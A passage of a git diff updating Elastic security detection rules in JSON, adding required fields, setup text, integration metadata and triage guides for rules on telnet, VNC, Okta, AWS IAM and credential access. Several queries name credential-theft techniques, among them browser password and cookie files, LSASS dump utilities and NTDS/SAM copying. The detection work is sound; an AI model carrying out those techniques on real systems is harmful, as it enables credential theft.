\"vbs\", \"vbe\", \"js\", \"wsh\", \"hta\")\n", "references": [ "https://blog.menasec.net/2019/11/hunting-for-suspicious-use-of.html" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "b25a7df2-120a-4db2-bd3f-3e4b86b24bee", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -51,5 +69,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 7 + "version": 9 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_telnet_port_activity.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_telnet_port_activity.json index e9e39f92954f3..09ea2483df21d 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_telnet_port_activity.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_telnet_port_activity.json @@ -17,6 +17,23 @@ "license": "Elastic License v2", "name": "Telnet Port Activity", "query": "event.category:(network or network_traffic) and network.transport:tcp and destination.port:23\n", + "required_fields": [ + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.transport", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "34fde489-94b0-4500-a76f-b8a157cf9269", "severity": "medium", @@ -73,5 +90,5 @@ "timeline_title": "Comprehensive Network Timeline", "timestamp_override": "event.ingested", "type": "query", - "version": 12 + "version": 13 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_tunneling_via_earthworm.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_tunneling_via_earthworm.json index f908579e6b55b..ca690efd7678c 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_tunneling_via_earthworm.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_tunneling_via_earthworm.json @@ -11,14 +11,27 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Protocol Tunneling via EarthWorm", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type == \"start\" and\n process.args : \"-s\" and process.args : \"-d\" and process.args : \"rssocks\"\n", "references": [ "http://rootkiter.com/EarthWorm/", "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "9f1c4ca3-44b5-481d-ba42-32dc215a2769", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -46,5 +59,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_vnc_virtual_network_computing_from_the_internet.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_vnc_virtual_network_computing_from_the_internet.json index 271cf74f36723..64bcfbe387415 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_vnc_virtual_network_computing_from_the_internet.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_vnc_virtual_network_computing_from_the_internet.json @@ -20,6 +20,33 @@ "references": [ "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.transport", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + } + ], "risk_score": 73, "rule_id": "5700cb81-df44-46aa-a5d7-337798f53eb8", "severity": "high", @@ -65,5 +92,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 11 + "version": 12 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_vnc_virtual_network_computing_to_the_internet.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_vnc_virtual_network_computing_to_the_internet.json index 342ac388736ba..2bacf02173368 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_vnc_virtual_network_computing_to_the_internet.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_vnc_virtual_network_computing_to_the_internet.json @@ -20,6 +20,33 @@ "references": [ "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.transport", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + } + ], "risk_score": 47, "rule_id": "3ad49c61-7adc-42c1-b788-732eda2f5abf", "severity": "medium", @@ -50,5 +77,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 11 + "version": 12 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_access_to_browser_credentials_procargs.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_access_to_browser_credentials_procargs.json index 021fc87afc5da..30e877ef6120b 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_access_to_browser_credentials_procargs.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_access_to_browser_credentials_procargs.json @@ -11,13 +11,26 @@ "language": "eql", "license": "Elastic License v2", "name": "Access of Stored Browser Credentials", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "process where event.type in (\"start\", \"process_started\") and\n process.args :\n (\n \"/Users/*/Library/Application Support/Google/Chrome/Default/Login Data\", \n \"/Users/*/Library/Application Support/Google/Chrome/Default/Cookies\", \n \"/Users/*/Library/Cookies*\", \n \"/Users/*/Library/Application Support/Firefox/Profiles/*.default/cookies.sqlite\", \n \"/Users/*/Library/Application Support/Firefox/Profiles/*.default/key*.db\", \n \"/Users/*/Library/Application Support/Firefox/Profiles/*.default/logins.json\", \n \"Login Data\",\n \"Cookies.binarycookies\", \n \"key4.db\", \n \"key3.db\", \n \"logins.json\", \n \"cookies.sqlite\"\n )\n", + "note": "", + "query": "process where event.type in (\"start\", \"process_started\") and\n process.args :\n (\n \"/Users/*/Library/Application Support/Google/Chrome/Default/Login Data\",\n \"/Users/*/Library/Application Support/Google/Chrome/Default/Cookies\",\n \"/Users/*/Library/Application Support/Google/Chrome/Profile*/Cookies\",\n \"/Users/*/Library/Cookies*\",\n \"/Users/*/Library/Application Support/Firefox/Profiles/*.default/cookies.sqlite\",\n \"/Users/*/Library/Application Support/Firefox/Profiles/*.default/key*.db\",\n \"/Users/*/Library/Application Support/Firefox/Profiles/*.default/logins.json\",\n \"Login Data\",\n \"Cookies.binarycookies\",\n \"key4.db\",\n \"key3.db\",\n \"logins.json\",\n \"cookies.sqlite\"\n )\n", "references": [ "https://securelist.com/calisto-trojan-for-macos/86543/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "20457e4f-d1de-4b92-ae69-142e27a4342a", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -35,6 +48,11 @@ "reference": "https://attack.mitre.org/tactics/TA0006/" }, "technique": [ + { + "id": "T1539", + "name": "Steal Web Session Cookie", + "reference": "https://attack.mitre.org/techniques/T1539/" + }, { "id": "T1555", "name": "Credentials from Password Stores", @@ -52,5 +70,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_attempted_bypass_of_okta_mfa.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_attempted_bypass_of_okta_mfa.json index fc3c3f5ca90d9..91b679b07455a 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_attempted_bypass_of_okta_mfa.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_attempted_bypass_of_okta_mfa.json @@ -10,14 +10,33 @@ "language": "kuery", "license": "Elastic License v2", "name": "Attempted Bypass of Okta MFA", - "note": "## Config\n\nThe Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:okta.system and event.action:user.mfa.attempt_bypass\n", "references": [ "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/" ], + "related_integrations": [ + { + "package": "okta", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "3805c3dc-f82c-4f8d-891e-63c24d3102b0", + "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "high", "tags": [ "Elastic", @@ -38,7 +57,7 @@ "technique": [ { "id": "T1111", - "name": "Two-Factor Authentication Interception", + "name": "Multi-Factor Authentication Interception", "reference": "https://attack.mitre.org/techniques/T1111/" } ] @@ -46,5 +65,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_attempts_to_brute_force_okta_user_account.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_attempts_to_brute_force_okta_user_account.json index ea2b05b485585..1bf0d315e4b20 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_attempts_to_brute_force_okta_user_account.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_attempts_to_brute_force_okta_user_account.json @@ -13,14 +13,33 @@ "language": "kuery", "license": "Elastic License v2", "name": "Attempts to Brute Force an Okta User Account", - "note": "## Config\n\nThe Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:okta.system and event.action:user.account.lock\n", "references": [ "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/" ], + "related_integrations": [ + { + "package": "okta", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "e08ccd49-0380-4b2b-8d71-8000377d6e49", + "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -54,5 +73,5 @@ "value": 3 }, "type": "threshold", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_aws_iam_assume_role_brute_force.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_aws_iam_assume_role_brute_force.json index 6ef3e3d255779..1c54726297ce7 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_aws_iam_assume_role_brute_force.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_aws_iam_assume_role_brute_force.json @@ -11,14 +11,49 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS IAM Brute Force of Assume Role Policy", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "## Triage and analysis\n\n### Investigating AWS IAM Brute Force of Assume Role Policy\n\nAn IAM role is an IAM identity that you can create in your account that has specific permissions. An IAM role is similar\nto an IAM user, in that it is an AWS identity with permission policies that determine what the identity can and cannot\ndo in AWS. However, instead of being uniquely associated with one person, a role is intended to be assumable by anyone\nwho needs it. Also, a role does not have standard long-term credentials such as a password or access keys associated\nwith it. Instead, when you assume a role, it provides you with temporary security credentials for your role session.\n\nAttackers may attempt to enumerate IAM roles in order to determine if a role exists before attempting to assume or\nhijack the discovered role.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Verify if the `RoleName` parameter contains a unique value in all requests or if the activity is potentially a brute\nforce attack.\n- Verify if the user account successfully updated a trust policy in the last 24 hours.\n- Examine whether this role existed in the environment by looking for past occurrences in your logs.\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Contact the account and resource owners and confirm whether they are aware of this activity.\n- Consider the time of day. If the user is a human (not a program or script), did the activity take place during a normal\ntime of day?\n- Examine the account's commands, API calls, and data management actions in the last 24 hours.\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services,\nand data accessed by the account in the last 24 hours.\n\n### False positive analysis\n\n- Verify the roles targeted in the failed attempts, and whether the subject role previously existed in the environment.\nIf only one role was targeted in the requests and that role previously existed, it may be a false positive, since\nautomations can continue targeting roles that existed in the environment in the past and cause false positives (FPs).\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with\nyour IT teams to minimize the impact on business operations during these actions.\n- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other\nIAM users.\n- Consider enabling multi-factor authentication for users.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/) by AWS.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "event.dataset:aws.cloudtrail and\n event.provider:iam.amazonaws.com and event.action:UpdateAssumeRolePolicy and\n aws.cloudtrail.error_code:MalformedPolicyDocumentException and event.outcome:failure\n", "references": [ "https://www.praetorian.com/blog/aws-iam-assume-role-vulnerabilities", "https://rhinosecuritylabs.com/aws/assume-worst-aws-assume-role-enumeration/" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "aws.cloudtrail.error_code", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "ea248a02-bc47-4043-8e94-2885b19b2636", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -50,5 +85,5 @@ "value": 25 }, "type": "threshold", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_azure_full_network_packet_capture_detected.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_azure_full_network_packet_capture_detected.json index 110345fd316bb..ec3aabba7f887 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_azure_full_network_packet_capture_detected.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_azure_full_network_packet_capture_detected.json @@ -14,13 +14,38 @@ "language": "kuery", "license": "Elastic License v2", "name": "Azure Full Network Packet Capture Detected", - "note": "## Config\n\nThe Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:\n (\n \"MICROSOFT.NETWORK/*/STARTPACKETCAPTURE/ACTION\" or\n \"MICROSOFT.NETWORK/*/VPNCONNECTIONS/STARTPACKETCAPTURE/ACTION\" or\n \"MICROSOFT.NETWORK/*/PACKETCAPTURES/WRITE\"\n ) and \nevent.outcome:(Success or success)\n", + "note": "", + "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:\n (\n \"MICROSOFT.NETWORK/*/STARTPACKETCAPTURE/ACTION\" or\n \"MICROSOFT.NETWORK/*/VPNCONNECTIONS/STARTPACKETCAPTURE/ACTION\" or\n \"MICROSOFT.NETWORK/*/PACKETCAPTURES/WRITE\"\n ) and\nevent.outcome:(Success or success)\n", "references": [ "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations" ], + "related_integrations": [ + { + "integration": "activitylogs", + "package": "azure", + "version": "0.12.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.activitylogs.operation_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "3ad77ed4-4dcf-4c51-8bfc-e3f7ce316b2f", + "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -49,5 +74,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 1 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_cmdline_dump_tool.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_cmdline_dump_tool.json index eaf284c3a6c1c..d730a846d6ac2 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_cmdline_dump_tool.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_cmdline_dump_tool.json @@ -12,13 +12,46 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Credential Access via Windows Utilities", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Potential Credential Access via Windows Utilities\n\nLocal Security Authority Server Service (LSASS) is a process in Microsoft Windows operating systems that is responsible\nfor enforcing security policy on the system. It verifies users logging on to a Windows computer or server, handles\npassword changes, and creates access tokens.\n\nThe `Ntds.dit` file is a database that stores Active Directory data, including information about user objects, groups, and\ngroup membership.\n\nThis rule looks for the execution of utilities that can extract credential data from the LSASS memory and Active\nDirectory `Ntds.dit` file.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as network connections, registry or file \nmodifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to identify what information was targeted.\n- Identify the target computer and its role in the IT environment.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious\nmust be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- If the host is a domain controller (DC):\n - Activate your incident response plan for total Active Directory compromise.\n - Review the privileges assigned to users that can access the DCs, to ensure that the least privilege principle is\n being followed and to reduce the attack surface.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "process where event.type in (\"start\", \"process_started\") and\n/* update here with any new lolbas with dump capability */\n(process.pe.original_file_name == \"procdump\" and process.args : \"-ma\") or\n(process.name : \"ProcessDump.exe\" and not process.parent.executable regex~ \"\"\"C:\\\\Program Files( \\(x86\\))?\\\\Cisco Systems\\\\.*\"\"\") or\n(process.pe.original_file_name == \"WriteMiniDump.exe\" and not process.parent.executable regex~ \"\"\"C:\\\\Program Files( \\(x86\\))?\\\\Steam\\\\.*\"\"\") or\n(process.pe.original_file_name == \"RUNDLL32.EXE\" and (process.args : \"MiniDump*\" or process.command_line : \"*comsvcs.dll*#24*\")) or\n(process.pe.original_file_name == \"RdrLeakDiag.exe\" and process.args : \"/fullmemdmp\") or\n(process.pe.original_file_name == \"SqlDumper.exe\" and process.args : \"0x01100*\") or\n(process.pe.original_file_name == \"TTTracer.exe\" and process.args : \"-dumpFull\" and process.args : \"-attach\") or\n(process.pe.original_file_name == \"ntdsutil.exe\" and process.args : \"create*full*\") or\n(process.pe.original_file_name == \"diskshadow.exe\" and process.args : \"/s\")\n", "references": [ "https://lolbas-project.github.io/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "00140285-b827-4aee-aa09-8113f58a08f3", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -58,5 +91,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_collection_sensitive_files.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_collection_sensitive_files.json index bd155ce8e914d..18597067a939a 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_collection_sensitive_files.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_collection_sensitive_files.json @@ -15,6 +15,28 @@ "references": [ "https://www.trendmicro.com/en_ca/research/20/l/teamtnt-now-deploying-ddos-capable-irc-bot-tntbotinger.html" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "6b84d470-9036-4cc0-a27c-6d90bbfe81ab", "severity": "medium", @@ -74,5 +96,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 1 + "version": 2 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_cookies_chromium_browsers_debugging.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_cookies_chromium_browsers_debugging.json index b50a678b18fc4..dcddb41d282db 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_cookies_chromium_browsers_debugging.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_cookies_chromium_browsers_debugging.json @@ -17,16 +17,34 @@ "license": "Elastic License v2", "max_signals": 33, "name": "Potential Cookies Theft via Browser Debugging", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "process where event.type in (\"start\", \"process_started\", \"info\") and\n process.name in (\n \"Microsoft Edge\",\n \"chrome.exe\",\n \"Google Chrome\",\n \"google-chrome-stable\",\n \"google-chrome-beta\",\n \"google-chrome\",\n \"msedge.exe\") and\n process.args : (\"--remote-debugging-port=*\", \n \"--remote-debugging-targets=*\", \n \"--remote-debugging-pipe=*\") and\n process.args : \"--user-data-dir=*\" and not process.args:\"--remote-debugging-port=0\"\n", + "note": "", + "query": "process where event.type in (\"start\", \"process_started\", \"info\") and\n process.name in (\n \"Microsoft Edge\",\n \"chrome.exe\",\n \"Google Chrome\",\n \"google-chrome-stable\",\n \"google-chrome-beta\",\n \"google-chrome\",\n \"msedge.exe\") and\n process.args : (\"--remote-debugging-port=*\",\n \"--remote-debugging-targets=*\",\n \"--remote-debugging-pipe=*\") and\n process.args : \"--user-data-dir=*\" and not process.args:\"--remote-debugging-port=0\"\n", "references": [ "https://github.com/defaultnamehere/cookie_crimes", "https://embracethered.com/blog/posts/2020/cookie-crimes-on-mirosoft-edge/", "https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/post/multi/gather/chrome_cookies.md", "https://posts.specterops.io/hands-in-the-cookie-jar-dumping-cookies-with-chromiums-remote-debugger-port-34c4f468844e" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "027ff9ea-85e7-42e3-99d2-bbb7069e02eb", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -56,5 +74,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_copy_ntds_sam_volshadowcp_cmdline.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_copy_ntds_sam_volshadowcp_cmdline.json index f7a566d3cbe04..42796338b3384 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_copy_ntds_sam_volshadowcp_cmdline.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_copy_ntds_sam_volshadowcp_cmdline.json @@ -14,14 +14,32 @@ "license": "Elastic License v2", "max_signals": 33, "name": "NTDS or SAM Database File Copied", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type in (\"start\", \"process_started\") and\n (\n (process.pe.original_file_name in (\"Cmd.Exe\", \"PowerShell.EXE\", \"XCOPY.EXE\") and\n process.args : (\"copy\", \"xcopy\", \"Copy-Item\", \"move\", \"cp\", \"mv\")\n ) or\n (process.pe.original_file_name : \"esentutl.exe\" and process.args : (\"*/y*\", \"*/vss*\", \"*/d*\"))\n ) and\n process.args : (\"*\\\\ntds.dit\", \"*\\\\config\\\\SAM\", \"\\\\*\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy*\\\\*\", \"*/system32/config/SAM*\")\n", "references": [ "https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/", "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md#atomic-test-3---esentutlexe-sam-copy" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": 